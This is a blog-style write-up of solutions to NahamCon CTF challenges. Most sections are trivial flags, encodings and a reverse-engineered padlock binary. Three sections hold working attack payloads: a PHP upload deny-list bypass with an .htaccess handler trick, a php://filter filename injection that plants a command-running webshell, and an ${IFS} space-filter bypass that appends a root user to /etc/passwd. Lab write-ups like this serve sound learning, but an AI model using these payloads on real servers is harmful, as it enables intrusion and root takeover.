Technical Support

Author: @JohnHammond#6971

Want to join the party of GIFs, memes and emoji spam? Or just want to ask a question for technical support regarding any challenges in the CTF? Join us in the Discord in the #nahamcon-ctf-general channel! You might just find a flag on the Discord server!

Go on the discord, in the #nahamcon-ctf-general channel, and we can see this in the channel description

2022-12-17-172256_1335x78_scrot

flag → flag{a98373a74abb8c5ebb8f5192e034a91c}

Baby’s First Heartbleed

Author: @JohnHammond#6971

Hey kids!! Wanna learn how to hack??!?! Start here to foster your curiosity!

Start the machine, and connect to it using nc

⌨️ nc challenge.nahamcon.com 31985

really guessed this one — when he asks for a string just type anything (like “hello” for example) and when he asks for a length, type a high number

You should see the flag appear in the server response:

2022-12-17-172914_1888x1032_scrot

flag → flag{bfca3d71260e581ba366dca054f5c8e5}

Read The Rules

Author: @JohnHammond#6971

Please follow the rules for this CTF!

Go to the rules pages and open up DevTools (or go to view-source) and you should find a comment with the flag at the very bottom of the page’s html

2022-12-17-173352_943x617_scrot

flag → flag{90bc54705794a62015369fd8e86e557b}

Hashstation

Author: @JohnHammond#6971

Below is a SHA256 hash! Can you determine what the original data was, before it was hashes?

705db0603fd5431451dab1171b964b4bd575e2230f40f4c300d70df6e65f5f1c

You could probably do it with hashcat, but i’m lazy so i’ll just use crackstation.net

2022-12-17-190623_1056x434_scrot

flag → flag{awesome}

Catscii

Author: @JohnHammond#6971

Do you know what the cat command does in the Linux command-line?

Download the file and cat its content

⌨️ cat catscii

2022-12-17-190848_1888x1032_scrot

flag → flag{258da40ab06be7c99099d603a3b3ccb1}

Banjo

Author: @JohnHammond#6971

Oooh, that classic twang! The banjo is one of my favorite strings instruments!

Download the image, and use the strings command on it, then grep flag

⌨️ strings banjo.jpg | grep flag

2022-12-17-191103_1888x1032_scrot

flag → flag{ce4e687e575392ae242f0e41c888de11}

Arjeebee

Author: @JohnHammond#6971

What is the rgb(19,55,175) color in its hexadecimal representation?

Go to rgbtohex.net and enter the RGB values

2022-12-17-191342_762x467_scrot

flag → flag{#1337AF}

Way 2 Basic

Author: @JohnHammond#6971

Here is some data represented in base 2. What is this data represented as ASCII text?

01100110 01101100 01100001 01100111 01111011 00111001 00110000 01100011 00110110 01100101 01100010 01100101 00111001 00110100 00110001 00110101 00110110 00110001 01100011 01100110 01100001 01100100 01100110 01100001 01100101 00110001 00110111 00110000 01100001 00111000 01100110 00110000 01100101 01100001 00110010 00110101 00110010 01111101

Go to any binary to text website (base 2 and binary are the same thing)

2022-12-17-191609_646x566_scrot

flag → flag{90c6ebe941561cfadfae170a8f0ea252}

Byepass

Author: @JohnHammond#6971

Help yourself Say Goodbye to days gone by with our easy online service! Upload your photos to capture the memory, cherish them with friends and family, and savor the time we have together!

Retrieve the flag out of the root of the filesystem /flag.txt.

Since we have the website’s source code, we can see that there is an upload form at /save_memories.php

We can also see which file extentions are blacklisted

$ext_denylist = array(
    "php",
    "php2",
    "php3",
    "php4",
    "php5",
    "php6",
    "php7",
    "phps",
    "phps",
    "pht",
    "phtm",
    "phtml",
    "pgif",
    "shtml",
    "phar",
    "inc",
    "hphp",
    "ctp",
);

The danger when using blacklists is forgetting something, and that’s what happened here: the .php16 extention is not filtered

The challenge’s description tells us that the flag is located in the root of the filesystem, so we can directly try to cat it using php

First, let’s create a exploit.php16 file, with our malicious code inside

<?php system("cat ../../../../../flag.txt"); ?>

Upload it, and read it by going to /exploit.php16

2022-12-17-203048_930x1026_scrot

aaaaaand… it’s blank

This can happen for two reasons:

  • It did not manage to cat the file
  • PHP engine is not enabled

Assuming flag.txt exists, it is because the php engine is not enabled

By looking at the request, we know it’s running Apache, so we can try to upload a .htaccess file that will enable php

.htaccess:

AddType application/x-httpd-php .php16
php_flag engine on

Upload dit, and read it by going to /.htaccess

2022-12-17-203816_929x261_scrot

We get a 403 Forbidden response, which is a good sign, because by default, Apache prevents users from reading files such as .htaccess

Now, let’s re-upload our php16 file

2022-12-17-204028_834x171_scrot

The PHP is now executed and not read

flag -> flag{32697ad7acd2d4718758d9a5ee42965d}

Use After Exit

Author: @carlopolop#3938

It's as easy as it looks, isn't it?

When we visit the website, we can see the following code:

<?php
error_reporting(0);
if (isset($_POST['submit'])) {
    $file_name = urldecode($_FILES['file']['name']);
    $tmp_path = $_FILES['file']['tmp_name'];
    if(strpos($file_name, ".jpg") == false){
        echo "Invalid file name";
        exit(1);
    }
    $content = file_get_contents($tmp_path);
    $all_content = '<?php exit(0);'. $content . '?>';
    $handle = fopen($file_name, "w");
    fwrite($handle, $all_content);
    fclose($handle);
    echo "Done.";
}
else{
    show_source(__FILE__);
}
?>

So we are going to have 2 things to bypass:

  • File needs to have .jpg in its name
  • <?php exit(0); ?> will be written at the beginning of the file

The first condition is very easy to bypass, since strpos checks if “.jpg” is anywhere in the file name, not at the end, so we can upload exploit.jpg.php

The second condition is more annoying, but by reading the fopen manual, and the supported wrappers page, we understand that we can use php wrappers such as filter:// inside of the fopen function

This is useful because if we look at the top of the script, the name of the file is passed through the urldecode() function

That will allow us to have special characters such as / in our file name

To prevent the exit(0) from bothering us, we will be using the php://filter/convert.base64-decode wrapper, because if we try to decode from base64, it gives us this: ^+t, which is exactly what we want

Let’s base64 encode a php “webshell”:

<?php system($_GET["cmd"]); ?>

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+

and paste this into a file that we’ll call

⌨️ php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3Dshell.jpg.php

that way, when it will be passed through the urldecode() function, the filename will look like this

⌨️ php://filter/convert.base64-decode/resource=shell.jpg.php

He will then decode and write this to shell.jpg.php:

<?php exit(0); PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+ ?>

which will look like this atfer decoding

^+t<?php system($_GET["cmd"]); ?>

Now that we’ve got our webshell, we can get the flag from user’s home by navigating to /shell.jpg.php?cmd=cat ../../../../home/user/flag.txt

2022-12-17-202338_930x1026_scrot

flag → flag{ab5f69d6cc412345387a0ca3a4700398}

Padlock

Author: @birch#9901

I forgot the combination to my pad lock :(

First step is to run the binary, and see how it acts

2022-12-17-230325_551x808_scrot

It asks for a passcode, then probably compares it with the right passcode

We’ll throw it into IDA, and press F5 to generate a pseudocode

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  print_lock(63LL, 63LL, 63LL, 63LL);
  printf("Please enter the passcode: ");
  __isoc99_fscanf(_bss_start, "%s", s);
  printf("The passcode you entered was: %s\n", s);
  replace(s, 51LL, 101LL);
  replace(s, 95LL, 32LL);
  replace(s, 48LL, 111LL);
  replace(s, 52LL, 97LL);
  if ( strlen(s) == 38 )
  {
    if ( !strcmp("master locks arent vry strong are they", s) )
    {
      replace(s, 101LL, 51LL);
      replace(s, 32LL, 95LL);
      replace(s, 111LL, 48LL);
      replace(s, 97LL, 52LL);
      unlock(s);
    }
  }
  else
  {
    printf("Not quite!");
  }
  return 0;
}

We can see that it takes our input, then replaces some values and compares it with the string “master locks arent vry strong are they”

These values in the replace() function are annoying so we are going to select them and press R (which will give us their Char value)

The pseudocode now looks like this

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  print_lock('?', '?', '?', '?');
  printf("Please enter the passcode: ");
  __isoc99_fscanf(_bss_start, "%s", s);
  printf("The passcode you entered was: %s\n", s);
  replace(s, '3', 'e');
  replace(s, '_', ' ');
  replace(s, '0', 'o');
  replace(s, '4', 'a');
  if ( strlen(s) == 38 )
  {
    if ( !strcmp("master locks arent vry strong are they", s) )
    {
      replace(s, 'e', '3');
      replace(s, ' ', '_');
      replace(s, 'o', '0');
      replace(s, 'a', '4');
      unlock(s);
    }
  }
  else
  {
    printf("Not quite!");
  }
  return 0;
}

We can see that it takes our input, “unleetifies” it (replaces 3 with e, spaces with _, 4 with a and 0 with o), compares it with the passcode and then calls the unlock() function

So, we just have to run the binary and enter the following passcode:

m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y

2022-12-17-231231_758x783_scrot

flag → flag{264cec034faef71c642de1721ea26b1f}

The Space Between Us

Author: @JohnHammond#6971

I've never felt this close to a character before. I hope the feeling is mutual...

Escalate your privileges and retrieve the flag out of root's home directory.

When we connect to the machine using netcat, we see that every spaces are filtered in our commands:

2022-12-17-231433_634x459_scrot

So, the first step is finding a way to execute commands with spaces

And to do that, there is an environment variable that exists by default in linux: ${IFS}

For example, to execute ls -la, we will have to write ls${IFS}-la

Now that we know this, we can list the content of the folder

2022-12-17-231629_567x259_scrot

We can see a README.md file, let’s take a look at it

2022-12-17-231714_494x197_scrot

It says that there is a misconfiguration in the filesystem, so we can start taking a look around

After spending a good hour enumerating every files and their permissions, I see that the /etc/passwd is writable

2022-12-17-231901_556x99_scrot

We are going to add a user to the file, who’s home directory will be /root

First, we need to generate a password hash for the user

⌨️ openssl passwd hack

Then, add a new line to the passwd file using echo (because nano & vim arent working)

⌨️ echo${IFS}"hacker:ZUVbo0DtkXUXw:0:0:root:/root:/bin/bash">>/etc/passwd

2022-12-17-182345_1888x1032_scrot

Of course, we still can’t use spaces so we use ${IFS}

Now, we can read /root/flag.txt as this user using su

⌨️ echo${IFS}hack${IFS}|${IFS}su${IFS}-${IFS}hacker${IFS}-c${IFS}"cat</root/flag.txt”

2022-12-17-182532_1888x1032_scrot

flag → flag{59af40c07bc6f02b457aa4c15543da2d}

Conclusion

I globally liked this CTF, there were some very interesting rooms and I learned new things so that’s a W

Thanks to everyone who participated and to my tm8 b0unce

certificate

2022-12-17-232956_1888x1032_scrot

1479 pts - 53/1658 (my username at the time was 99makarov)